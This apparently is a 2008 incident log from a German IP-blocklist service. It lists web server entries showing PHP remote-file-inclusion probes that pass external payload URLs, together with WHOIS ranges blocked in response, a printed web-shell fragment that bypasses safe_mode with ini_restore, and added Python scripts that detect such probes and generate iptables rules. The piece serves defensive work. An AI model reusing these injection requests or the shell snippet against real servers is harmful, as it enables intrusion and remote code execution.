42.173.212.67.no-rdns.ord02.singlehop.net - - [25/Aug/2008:20:12:01 +0200] "GET //errors.php?error=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 6450 "-" "libwww-perl/5.811"
PHP-shell (remote file inclusion) attempt with an external URL.
Both the source IP range and the range hosting the exploit get blocked as hacker.
source:
67.212.173.42 US SINGLEHOP-S1-AWARDS-INC-COM NET-67-212-160-0-1 67.212.173.40 - 67.212.173.47 67.212.173.40/29 2008-03-06 SINGL-8
blocked as hacker
Destination:
81.137.209.202 GB BT-ADSL 81.137.192.0 - 81.137.215.255 81.137.192.0/19 2003-04-28 Single Static IP Addresses
tagged as hacker:
200.213.33.2 POLICLINICA MILITAR DE PORTO ALEGRE (16331) 200.213/16 200.213.33.0 - 200.213.33.63 200.213.33.0/26
tagged as hacker
80.154.35.22 DE TOIAG-ROOTSERVER-02 80.154.32.0 - 80.154.63.255 80.154.32.0/19 2005-05-23 T-Online International AG
tagged as hacker
Honestly, when writing today's emails hinting at www.netsecdb.de, I had not yet read the heise Security newsticker.
If what they report is right, the VoIP system of the
US Department of Homeland Security was hacked and over the weekend more than 400 calls were made to Asia and the Middle East (costing about 12,000 US dollars).
80.190.200.171 DE PIRATENPARTEI-NET-DE DE-IP-PARTNER-20020717 80.190.200.168 - 80.190.200.175 80.190.200.168/29 2007-07-04 Piratenpartei Bayern
blocked as hackers
It offers JonDos-based anonymisation services to anyone. They sell the service to get their ROI:
the anonymisation server of the Pirate Party.
They state that any lawsuit will be published on their website. So let's do it the other way round:
It's surely a very trustworthy name:
vps.lateadultmovies.com
coming from:
69.73.155.242 US JAGUAR-TECHNOLOGIES-NOC NET-69-0-0-0-0 69.73.128.0 - 69.73.191.255 69.73.128.0/18 2003-11-05 JTL-8
blocked as hacker.
89.18.166.209 NL PCEXTREME 89.18.166.0 - 89.18.168.255 89.18.160.0/20 2005-10-03 PCextreme BV
blocked as hacker:
62.80.50.163 - - [06/Aug/2008:22:39:47 +0200] "GET /?q=http%3A%2F%2Fwww.boomerbible.com%2Finstapunk%2FMType%2Farchives%2Fajuq%2Fevuji%2F HTTP/1.0" 404 6095 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
218.75.5.212 CN HY-PEOPLE-GOVNMENT 218.75.5.208 - 218.75.5.215 218.75.5.208/29 2006-12-29 HuangYan People's Govnment
upgraded from spammer and sniffer to hacker - blocked:
That apparently belongs to the sporting daily routine of certain people:
Aug 18 23:55:35 courierpop3login: LOGIN FAILED, user=admin, ip=[::ffff:216.73.118.154]
Since I simply don't like these attempts (whatever user name they use), the corresponding net range now belongs to the blocked ones as well. And it is thereby distributed automatically via netsecdb to the users of this service.
Edit from Claus:
216.73.118.154 US OC-NET-3 NET-216-73-96-0-1 216.73.112.0 - 216.73.127.255 216.73.112.0/20 2002-10-07 OCHS
blocked as hacker at the request of STATS node CH
Guys - you should know me better from the past:
85.205.116.172 - - [29/Jul/2008:18:27:49 +0200] "GET /status HTTP/1.1" 404 6087 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
tried by:
85.205.116.172 DE DE-ON-20050113 EU-ZZ-80-93 85.205.0.0 - 85.205.255.255 85.205.0.0/16 2005-01-13 Vodafone Group Services
Such things are only done over IPsec from dedicated private IPs.
Net not tagged.
---------------------------------
bot.txt\?\?
---------------------------------
SysTrojan
Wrong Place
// Probe whether shell commands run at all: `id` on Unix prints "uid=...",
// `net start` on Windows prints "Windows ...". ex() is the shell's own
// command-execution wrapper (not shown on this page).
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
    echo("Safe Mode of this Server is : ");
    echo("SafemodeOFF");
}
else{
    // Commands blocked: ini_restore() resets a directive to its php.ini value,
    // which on older PHP builds undid per-vhost safe_mode/open_basedir settings.
    // Then probe again.
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
        echo("Safe Mode of this Server is : ");
        echo("SafemodeOFF");
    }else{
        echo("Safe Mode of this Server is : ");
We assume that this never happens by mistake.
Result: your network range gets completely blocked, and the block is distributed to the partner servers.
Claus
Using a destination someone already tried gives no points - sorry.
If you run out of injection URLs, give http://dnsbl.abuse.ch/httpbl/injections.php a try.
The called scripts mostly want to know about the server environment:
Error 403
www.netsecdb.de
Sun Aug 17 11:44:24 2008
Notepad/1.0.1 (typing)
And please remember: firewall rules based on netsecdb are generated at :00 and :30, and with them the htaccess and iptables scripts for the external partners.
So hurry up before time runs out.
You did read the netsecdb documentation, didn't you? rtfmf.
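What netsecdb does with a line like the courierpop3login failure above, and with the WHOIS ranges quoted throughout this page, can be reproduced in a few lines. The following Python is an added example, not netsecdb's own generator: it counts failed courier logins per source address (unwrapping the ::ffff: IPv4-mapped form courier logs), looks the address up in a WHOIS-style first/last range table, converts that range into CIDR prefixes, and renders iptables and Apache 2.2 .htaccess deny rules. The log lines, the range table and the exact rule syntax (iptables -I INPUT ... -j DROP, Deny from ...) are assumptions made for this example; the page does not show the real script format.

```python
"""From failed courier logins and WHOIS ranges to iptables / htaccess block rules.

Added example, not netsecdb's own generator.  The log lines, the range table
and the rule syntax are constructed for this example.
"""
import ipaddress
import re
from collections import Counter

# courier-pop3d / courier-imapd failure record as on the page:
# "Aug 18 23:55:35 courierpop3login: LOGIN FAILED, user=admin, ip=[::ffff:216.73.118.154]"
FAIL_RE = re.compile(
    r'courier(?:pop3|imap)login: LOGIN FAILED, user=(?P<user>[^,]*), ip=\[(?P<ip>[^\]]+)\]'
)


def parse_failures(lines):
    """Count failed logins per source address.

    courier logs IPv4 clients as IPv4-mapped IPv6 (::ffff:a.b.c.d); unwrap them so
    the address can be matched against IPv4 WHOIS ranges.
    """
    counts = Counter()
    for line in lines:
        m = FAIL_RE.search(line)
        if not m:
            continue
        ip = ipaddress.ip_address(m.group("ip"))
        if ip.version == 6 and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped
        counts[str(ip)] += 1
    return counts


def range_to_cidrs(first, last):
    """Turn a WHOIS 'first - last' inetnum into the minimal list of CIDR prefixes.

    WHOIS often prints an allocation larger than the assignment (the page lists
    89.18.166.0 - 89.18.168.255 next to 89.18.160.0/20); summarising the range
    itself blocks exactly the assigned addresses.
    """
    return [str(n) for n in ipaddress.summarize_address_range(
        ipaddress.ip_address(first), ipaddress.ip_address(last))]


def covering_range(ip, ranges):
    """Return the (first, last) range containing ip, or None if the table has none."""
    addr = ipaddress.ip_address(ip)
    for first, last in ranges:
        lo, hi = ipaddress.ip_address(first), ipaddress.ip_address(last)
        if lo.version == addr.version and lo <= addr <= hi:
            return first, last
    return None


def ranges_to_block(counts, ranges, threshold=1):
    """CIDRs to block: the whole WHOIS range of every source with >= threshold failures.

    The page blocks on the first attempt (threshold=1); a higher threshold is the
    knob for shared or NATed networks.  A source without a known range is blocked
    as a single host.
    """
    cidrs = set()
    for ip, n in counts.items():
        if n < threshold:
            continue
        rng = covering_range(ip, ranges)
        if rng is None:
            cidrs.add(str(ipaddress.ip_network(ip)))  # /32 or /128
        else:
            cidrs.update(range_to_cidrs(*rng))
    return sorted(cidrs)


def block_rules(cidrs):
    """Render the two formats distributed to partners (syntax assumed for this example)."""
    iptables = [f"iptables -I INPUT -s {c} -j DROP" for c in cidrs]
    # Apache 2.2 access control: with Order allow,deny a matching Deny wins.
    htaccess = ["Order allow,deny"] + [f"Deny from {c}" for c in cidrs] + ["Allow from all"]
    return iptables, htaccess


# Constructed input: courier log excerpt and a WHOIS-style range table.
SAMPLE_MAILLOG = [
    "Aug 18 23:55:35 courierpop3login: LOGIN FAILED, user=admin, ip=[::ffff:203.0.113.5]",
    "Aug 18 23:55:37 courierpop3login: LOGIN FAILED, user=test, ip=[::ffff:203.0.113.5]",
    "Aug 18 23:55:39 courierpop3login: LOGIN FAILED, user=root, ip=[::ffff:203.0.113.5]",
    "Aug 18 23:57:02 courierimaplogin: LOGIN FAILED, user=info, ip=[198.51.100.2]",
    "Aug 18 23:58:11 courierpop3login: LOGIN, user=alice, ip=[::ffff:192.0.2.10]",
]
WHOIS_RANGES = [
    ("203.0.113.0", "203.0.113.255"),    # constructed entry
    ("216.73.112.0", "216.73.127.255"),  # OC-NET-3 / OCHS as listed on the page
]

if __name__ == "__main__":
    cidrs = ranges_to_block(parse_failures(SAMPLE_MAILLOG), WHOIS_RANGES)
    for fmt in block_rules(cidrs):
        print("\n".join(fmt), end="\n\n")
```

Run it as a script and it prints the iptables lines followed by the htaccess fragment for the constructed input. The successful "LOGIN," record is ignored, and the source with no matching WHOIS entry is blocked as a single /32 rather than skipped.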
I already wrote that 85.92.140.0/24 Flexwebhosting BV is blocked.
What sense does it make to request scripts from blocked nets?
provided by: 1&1 Internet Inc.
74.208.16.73 US CUSTOMERS-1 1AN1-NETWORK 74.208.0.0 - 74.208.63.255 74.208.0.0/18 2007-01-16 1 and 1 Internet Inc.
infong523.lxa.perfora.net - - [16/Aug/2008:22:54:31 +0200] "GET //errors.php?error=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 6095 "-" "libwww-perl/5.805"
But that was about a story with a car. This one is
provided by EuroAccess Enterprises Ltd:
85.12.15.28 NL NL-XENTRONIX 85.12.15.0 - 85.12.15.255 85.12.15.0/24 2006-11-08 Xentronix PA Assignment #4
77.221.130.5 RU DATAPOINT-NET2 RU-INFOBOX-20070330 77.221.128.0 - 77.221.143.255 77.221.128.0/20 2007-09-26 Colocation and virtual hosting
was already tagged as spammer and sniffer - 'upgraded'
srv005.infobox.ru - - [16/Aug/2008:17:50:28 +0200] "GET ///vwar/backup/errors.php?error=http://biz4youhost.com//2.id.txt?? HTTP/1.1" 404 6095 "-" "libwww-perl/5.803"
srv005.infobox.ru - - [16/Aug/2008:17:50:29 +0200] "GET /?q=node///vwar/backup/errors.php?error=http://biz4youhost.com//2.id.txt?? HTTP/1.1" 404 6202 "-" "libwww-perl/5.803"
nslookup biz4youhost.com
rachel.web-dns1.com - - [16/Aug/2008:19:34:11 +0200] "GET /?q=node///vwar/backup/errors.php?error=http://matrix-computers.net//language/Za/id.txt??? HTTP/1.1" 404 6216 "-" "libwww-perl/5.812"
rachel.web-dns1.com - - [16/Aug/2008:19:34:11 +0200] "GET /?q=node/79///vwar/backup/errors.php?error=http://matrix-computers.net//language/Za/id.txt??? HTTP/1.1" 200 11544 "-" "libwww-perl/5.812"
69.61.106.55 US TRUSTED-IP-NETWORKS-69-61-106-0-24 NET-69-61-0-0-1 69.61.106.0 - 69.61.106.255 69.61.106.0/24
cidrcheck 2008-04-21 TIPNE
already blocked.
nslookup matrix-computers.net
80.50.70.78 PL MAN-KRAKOW-AR2 80.50.70.0 - 80.50.70.255 80.50.70.0/24 2005-04-14 Man Krakow kra_ar2 (zlote port
provided by: TP S.A.
do-gorlice.net.tpnet.pl - - [16/Aug/2008:19:18:22 +0200] "GET /?mosConfig_absolute_path=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 200 50705 "-" "libwww-perl/5.803"
do-gorlice.net.tpnet.pl - - [16/Aug/2008:19:18:24 +0200] "GET /?q=node/?mosConfig_absolute_path=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 6202 "-" "libwww-perl/5.803"
nominated itself as hacker-net - confirmed.
nslookup www.degeheimedienst.nl
Non-authoritative answer:
Name: www.degeheimedienst.nl
Address: 85.92.140.140
85.92.140.140 NL Flexwebhosting 85.92.140.0 - 85.92.140.255 85.92.140.0/24 2006-03-02 Flexwebhosting BV
added to blocked netranges.
P.S.: as pointed out several times before, external URLs don't work on our servers for exploits:

printunion.ru - - [16/Aug/2008:17:53:57 +0200] "GET //errors.php?error=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 6095 "-" "libwww-perl/5.805"
printunion.ru - - [16/Aug/2008:17:55:25 +0200] "GET /?q=node//errors.php?error=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 6218 "-" "libwww-perl/5.805"
printunion.ru - - [16/Aug/2008:17:55:25 +0200] "GET /?q=node/79//errors.php?error=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 200 11520 "-" "libwww-perl/5.805"
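The entries above all hit the same pattern: a libwww-perl client requests errors.php (or passes mosConfig_absolute_path, or the Drupal q parameter) with an external http:// URL, and the host in that URL is then resolved with nslookup and blocked by range together with the source. The following Python is an added example, not code from netsecdb or from this page: it parses Apache combined-format lines like the ones above, URL-decodes the request so the %3A%2F%2F form from the 6 August entry is caught as well, and collects every remote payload host with the sources that pointed at it. The log lines and host names in it are constructed (RFC 5737 documentation addresses and example.net/.org names), not real traffic.

```python
"""Find remote-file-inclusion probes in Apache combined-format log lines.

Added example (not code from netsecdb or this page).  The sample lines are
constructed from the shapes shown on the page, with RFC 5737 documentation
addresses and example.net/.org host names in place of real ones.
"""
import re
from urllib.parse import unquote, urlsplit

# Apache combined format: host ident user [time] "METHOD target HTTP/x" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?:\d+|-) "[^"]*" "(?P<agent>[^"]*)"$'
)

# A parameter whose value is an absolute http(s) URL anywhere in the decoded
# target.  Matching on the whole decoded string (not on parse_qs) catches the
# nested form the page shows, e.g. ?q=node/79///vwar/backup/errors.php?error=http://...
# The value ends at '&', whitespace or a control character (the page's
# readme.txt?%0D?? decodes to a carriage return).
RFI_RE = re.compile(r'(?P<param>[A-Za-z_][\w\[\]]*)=(?P<url>https?://[^&\s\x00-\x1f]+)')


def find_rfi(line):
    """Return {'source','status','agent','hits'} for an RFI probe, or None for a normal request.

    Each hit is {'param','url','host'}: the abused parameter, the injected URL
    and the remote host that would be fetched if allow_url_include were on.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote(m.group("target"))  # %3A%2F%2F -> ://
    hits = []
    for p in RFI_RE.finditer(decoded):
        host = urlsplit(p.group("url")).hostname
        if host:
            hits.append({"param": p.group("param"), "url": p.group("url"), "host": host})
    if not hits:
        return None
    return {"source": m.group("host"), "status": int(m.group("status")),
            "agent": m.group("agent"), "hits": hits}


def payload_hosts(lines):
    """Map each remote payload host to the set of source addresses that pointed at it.

    These hosts are what the page resolves with nslookup and then blocks by range.
    """
    hosts = {}
    for line in lines:
        rec = find_rfi(line)
        if rec is None:
            continue
        for h in rec["hits"]:
            hosts.setdefault(h["host"], set()).add(rec["source"])
    return hosts


# Constructed sample log, modelled on the page's entries (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Aug/2008:17:50:28 +0200] "GET ///vwar/backup/errors.php?error=http://payload.example.net//2.id.txt?? HTTP/1.1" 404 6095 "-" "libwww-perl/5.803"',
    '203.0.113.7 - - [16/Aug/2008:17:50:29 +0200] "GET /?q=node/79///vwar/backup/errors.php?error=http://payload.example.net//2.id.txt?? HTTP/1.1" 200 11544 "-" "libwww-perl/5.803"',
    '198.51.100.9 - - [06/Aug/2008:22:39:47 +0200] "GET /?q=http%3A%2F%2Fshell.example.org%2Fcmd%2F HTTP/1.0" 404 6095 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"',
    '198.51.100.9 - - [16/Aug/2008:19:18:22 +0200] "GET /?mosConfig_absolute_path=http://payload.example.net/sistcmd.txt?%0D?? HTTP/1.1" 200 50705 "-" "libwww-perl/5.803"',
    '192.0.2.44 - - [29/Jul/2008:18:27:49 +0200] "GET /status HTTP/1.1" 404 6087 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4)"',
]

if __name__ == "__main__":
    for host, sources in sorted(payload_hosts(SAMPLE_LOG).items()):
        print(f"{host}: used by {', '.join(sorted(sources))}  -> nslookup, whois, block range")
```

Note that a 200 response (the page's /?q=node/79 variants) only means Drupal rendered node 79; whether the include actually fetched anything depends on allow_url_include, which is why the author can say external URLs "don't work" here. The script therefore reports every probe regardless of status and leaves resolving and WHOIS lookup of the collected hosts to the operator.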

Copyright © 2008-2010 Claus Marxmeier EDV-Service
All rights reserved. In particular, reprinting, inclusion in online services and the Internet, and reproduction on data carriers
such as CD-ROM, DVD-ROM etc. require prior written consent.
The providers accept no liability for unsolicited manuscripts and photos.
Designed by Claus Marxmeier.
